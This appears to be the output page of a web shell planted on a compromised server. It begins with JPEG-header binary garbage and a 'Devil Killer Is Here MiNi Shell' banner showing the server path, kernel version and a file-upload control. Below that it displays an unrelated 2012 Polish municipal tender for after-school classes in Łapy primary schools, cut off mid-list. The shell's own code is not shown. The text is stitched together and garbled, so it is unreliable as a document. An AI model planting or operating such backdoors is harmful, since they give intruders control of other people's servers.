JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120807/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120807/170735-N-2012.html

<p class="kh_header"><b>Łapy: Prowadzenie zajęć z projektu Indywidualizacja   procesu nauczania w klasach I-III w Gminie Łapy</b><br>
<b>Numer ogłoszenia: 170735 - 2012; data zamieszczenia: 07.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łapach , ul. gen. Wł. Sikorskiego 24, 18-100 Łapy, woj. podlaskie, tel. 085 7152251, faks 085 7152256.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lapy.podlasie.pl, www.bip.lapy.podlasie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć z projektu Indywidualizacja   procesu nauczania w klasach I-III w Gminie Łapy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest prowadzenie zajęć z projektu Indywidualizacja procesu nauczania w klasach I-III w Gminie Łapy w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działania 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki 2007-2013 w  59 częściach.

2.  Zajęcia pozalekcyjne wchodzące w skład poszczególnych części zamówienia przeznaczone są dla uczniów klas I-III w sześciu szkołach podstawowych, które jednocześnie będą płatnikami należności Wykonawcy:

a) Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy, NIP: 9660592922, REGON:  000734481;
b) Szkoła Podstawowa nr 2 im. Mikołaja Kopernika, ul. Piękna 17, 18-100 Łapy, NIP: 9660584130, REGON: 000734498;
c) Szkoła Podstawowa nr 3 im. Marii Konopnickiej, ul. Letnia 1, 18-100 Łapy, NIP: 9661687240, REGON: 052213362;
d) Szkoła Podstawowa im. Jana III Sobieskiego, Płonka Kościelna, 18-100 Łapy, NIP: 9661625693, REGON: 052132758;
e) Szkoła Podstawowa im. H. Kołłątaja w Uhowie, ul. Cmentarna 2, 18-100 Łapy, NIP: 9661346734, REGON: 00073 4535;
f) Szkoła Podstawowa w Łupiance Starej, Łupianka Stara, 18-100 Łapy, NIP: 9661396695, REGON: 000734529.

3. Zajęcia będą odbywały się bezpośrednio po obowiązkowych zajęciach edukacyjnych. Wykonawcy będą zobowiązani bezwzględnie dostosować się do ustalonego przez dyrektora szkoły planu zajęć.

4. Czas trwania poszczególnych zajęć będzie zgodny z Rozporządzeniem Ministra Edukacji Narodowej z dnia 17 listopada 2010 r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. Nr 228, poz. 1487).

5. W ramach realizacji usługi Wykonawca jest zobowiązany między innymi do:
1)  Opracowania programu prowadzonych zajęć. Program przed  rozpoczęciem zajęć wymaga zatwierdzenia przez dyrektora szkoły.
2) Gromadzenia oraz prowadzenie wszelkiej dokumentacji związanej z rekrutacją uczniów (pisemne zgody rodziców lub opiekunów na udział uczniów w projekcie).
3) Prowadzenia zajęć wg  przygotowanych  przez Wykonawcę w oparciu o   harmonogramy zajęć stanowiące załączniki nr 1-6 do SIWZ,  szczegółowe harmonogramy  zajęć zatwierdzone przez dyrektora szkoły, w której prowadzone są te zajęcia.
Harmonogramy będą zmieniane każdorazowo w wypadku zmiany planu zajęć szkoły. Wykonawca musi wykazać się dyspozycyjnością i elastycznością wobec zmian w harmonogramach. Wyjściowe dane harmonogramu, tj. liczbę godzin zajęć do przeprowadzenia w danej części zamówienia, w zależności od szkoły, przedstawiają załączniki nr 1-6 do SIWZ.
4) Dokumentowania prowadzonych zajęć w dzienniku zajęć w sposób uzgodniony z dyrektorem szkoły.
5) Wykorzystywania najnowszych narzędzi edukacyjnych, które zapewni szkoła.
6) Dokonywania diagnozy przyrostu wiedzy uczniów i dokonywania ewaluacji prowadzonych zajęć w odniesieniu do założonych celów i planowanych do osiągnięcia w ramach realizacji projektu wskaźników i przedstawianie informacji dotyczącej tych zadań przynajmniej raz w semestrze.
7) Sporządzania między innymi:
a) wykazów przepracowanych godzin do listy płac,
b) sprawozdań z realizacji wykonywanego zadania - przynajmniej raz na kwartał - na formularzach dostarczonych przez dyrektora szkoły.
8) Szczegółowy zakres obowiązków Wykonawcy określa wzór umowy stanowiącej  załącznik  nr 7 do SIWZ.


Część 1	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. I	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 2	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. II	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 3	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. III	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 4	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. I b	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	40
Część 5	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. II	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	30
Część 6	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. III a	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	70
Część 7	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. III b	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	70
Część 8	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. I	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy	01.09.2012- 30.06.2013	32
Część 9	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. II
	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy	01.09.2012- 30.06.2013	32
Część 10	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. III 	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy	01.09.2012- 30.06.2013	32
Część 11	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. I-III	Szkoła Podstawowa im. Jana III Sobieskiego w Płonce Kościelnej, 18-100 Łapy	01.09.2012- 30.06.2013	36
Część 12	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w kl. II-III	Szkoła Podstawowa w Łupiance Starej, 18-100 Łapy	01.09.2012- 30.06.2013	54
Część 13	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w kl. I	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 14	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w kl. II	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 15	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w kl. III	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	35
Część 16	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w kl. III	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	60
Część 17	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w kl. I	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy	01.09.2012- 30.06.2013	32
Część 18	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w kl. II	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy	01.09.2012- 30.06.2013	32
Część 19	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w kl. III	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy	01.09.2012- 30.06.2013	32
Część 20	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w kl. I-III	Szkoła Podstawowa im. Jana III Sobieskiego w Płonce Kościelnej, 18-100 Łapy	01.09.2012- 30.06.2013	72
Część 21	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w kl. I-III	Szkoła Podstawowa im. H. Kołłątaja w Uhowie, ul. Cmentarna 2, 18-100 Łapy	01.09.2012- 30.06.2013	30
Część 22	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy kl. II	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	50
Część 23	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy kl. I	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy	01.09.2012- 30.06.2013	32
Część 24	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy kl. II	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy	01.09.2012- 30.06.2013	32
Część 25	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy kl. III	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy	01.09.2012- 30.06.2013	32
Część 26	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy kl. I-III (1 grupa)	Szkoła Podstawowa im. Jana III Sobieskiego w Płonce Kościelnej, 18-100 Łapy	01.09.2012- 30.06.2013	36
Część 27	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy kl. I-III (2 grupa)	Szkoła Podstawowa im. Jana III Sobieskiego w Płonce Kościelnej, 18-100 Łapy	01.09.2012- 30.06.2013	36
Część 28	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy kl. I-III 	Szkoła Podstawowa w Łupiance Starej, 18-100 Łapy	01.09.2012- 30.06.2013	30
Część 29	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy kl. II (1 grupa)	Szkoła Podstawowa im. H. Kołłątaja w Uhowie, ul. Cmentarna 2, 18-100 Łapy	01.09.2012- 30.06.2013	30
Część 30	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy kl. II (2 grupa)	Szkoła Podstawowa im. H. Kołłątaja w Uhowie, ul. Cmentarna 2, 18-100 Łapy	01.09.2012- 30.06.2013	30
Część 31	Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej w kl. I-III	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 32	Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej w kl. I i III	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	30
Część 33	Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej w kl. I 	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy
	01.09.2012- 30.06.2013	32
Część 34	Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej w kl. II	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy
	01.09.2012- 30.06.2013	32
Część 35	Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej w kl. III	Szkoła Podstawowa nr 3 im. Marii Konopnickiej , ul. Letnia 1, 18-100 Łapy
	01.09.2012- 30.06.2013	32
Część 36	Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej w kl. I-III	Szkoła Podstawowa im. Jana III Sobieskiego w Płonce Kościelnej, 18-100 Łapy	01.09.2012- 30.06.2013	72
Część 37	Gimnastyka korekcyjna dla dzieci z wadami postawy kl. I-III	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 38	Gimnastyka korekcyjna dla dzieci z wadami postawy kl. I i III	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	30
Część 39	Specjalistyczne zajęcia terapeutyczne dla dzieci niepełnosprawnych  kl. I-III - zajęcia rewalidacyjne	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	35
Część 40	Specjalistyczne zajęcia terapeutyczne - terapia pedagogiczna - kl. I	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 41	Specjalistyczne zajęcia terapeutyczne - terapia pedagogiczna - kl. II
	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 42	Specjalistyczne zajęcia terapeutyczne - terapia pedagogiczna - kl. III	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy
	01.09.2012- 30.06.2013	70
Część 43	Zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych - kl. III - W zgodzie z przyrodą	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 44	Zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych - kl. III - Zajęcia matematyczne	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 45	Zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych - kl. IIa - Zajęcia rozwijające zainteresowania uczniów uzdolnionych matematycznie	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	50
Część 46	Zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych - kl. IIb - Zajęcia z dziećmi uzdolnionymi matematycznie	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	50
Część 47	Zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych - kl. IIIa - Koło matematyczne
	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	30
Część 48	Zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych - kl. IIIb - Koło matematyczne
	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	30
Część 49	Zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych - kl. I-III - Koło matematyczno-przyrodnicze	Szkoła Podstawowa im. Jana III Sobieskiego w Płonce Kościelnej, 18-100 Łapy	01.09.2012- 30.06.2013	72
Część 50	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - kl. III - Wesołe nutki	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 51	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - kl. II - Mały Omnibus	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	30
Część 52	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - kl. III - W krainie języka polskiego	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 53	Zainteresowania uczniów szczególnie uzdolnionych - kl. III - Zajęcia informatyczne	Szkoła Podstawowa nr 1 im. Papieża Jana Pawła II, ul. Polna 9, 18-100 Łapy	01.09.2012- 30.06.2013	70
Część 54	Zainteresowania uczniów szczególnie uzdolnionych - kl. III - Papierowe fantazje - świat origami	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	60
Część 55	Zainteresowania uczniów szczególnie uzdolnionych - kl. Ia - Dobrze czytam, piszę, liczę	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	60
Część 56	Zainteresowania uczniów szczególnie uzdolnionych - kl. Ib - Chcę wiedzieć więcej	Szkoła Podstawowa nr 2  im. Mikołaja Kopernika, ul. Piękna 17, 18-100  Łapy	01.09.2012- 30.06.2013	40
Część 57	Zainteresowania uczniów szczególnie uzdolnionych - kl. I-III - Koło matematyczne	Szkoła Podstawowa im. Jana III Sobieskiego w Płonce Kościelnej, 18-100 Łapy	01.09.2012- 30.06.2013	36
Część 58	Zainteresowania uczniów szczególnie uzdolnionych - kl. II-III - Młody ekolog	Szkoła Podstawowa w Łupiance Starej, 18-100 Łapy	01.09.2012- 30.06.2013	54
Część 59	Zainteresowania uczniów szczególnie uzdolnionych - kl. I - Matematyczne preteksty	Szkoła Podstawowa w Łupiance Starej, 18-100 Łapy	01.09.2012- 30.06.2013	54.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 59.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania tego warunku należy składając ofertę częściową wykazać dysponowanie osobą posiadającą kwalifikacje  do prowadzenia zajęć określonych w każdej części zgodne z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończenia zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz. 400 z późniejszymi zmianami).
Dlatego:
1)	składając ofertę częściową na części zamówienia od nr 1 do 12  należy wykazać dysponowanie osobą, która ukończyła:
- studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, posiada przygotowanie pedagogiczne oraz przygotowanie w zakresie terapii pedagogicznej,
lub
- studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, posiada przygotowanie pedagogiczne oraz przygotowanie w zakresie terapii pedagogicznej,
lub
- studia magisterskie na kierunku (specjalności) innym od nauczanego przedmiotu lub prowadzonymi zajęciami lub nieobejmującym zakresu określonego w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych nauczanego przedmiotu lub prowadzonych zajęć i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć,  posiada przygotowanie pedagogiczne oraz przygotowanie w zakresie terapii pedagogicznej,
- studia wyższe na kierunku pedagogika w specjalności przygotowującej do pracy z dziećmi w wieku przedszkolnym lub wczesnoszkolnym oraz przygotowanie w zakresie terapii pedagogicznej,
lub
- zakład kształcenia nauczycieli w specjalności przygotowującej do pracy z dziećmi w wieku przedszkolnym lub wczesnoszkolnym oraz przygotowanie w zakresie terapii pedagogicznej;
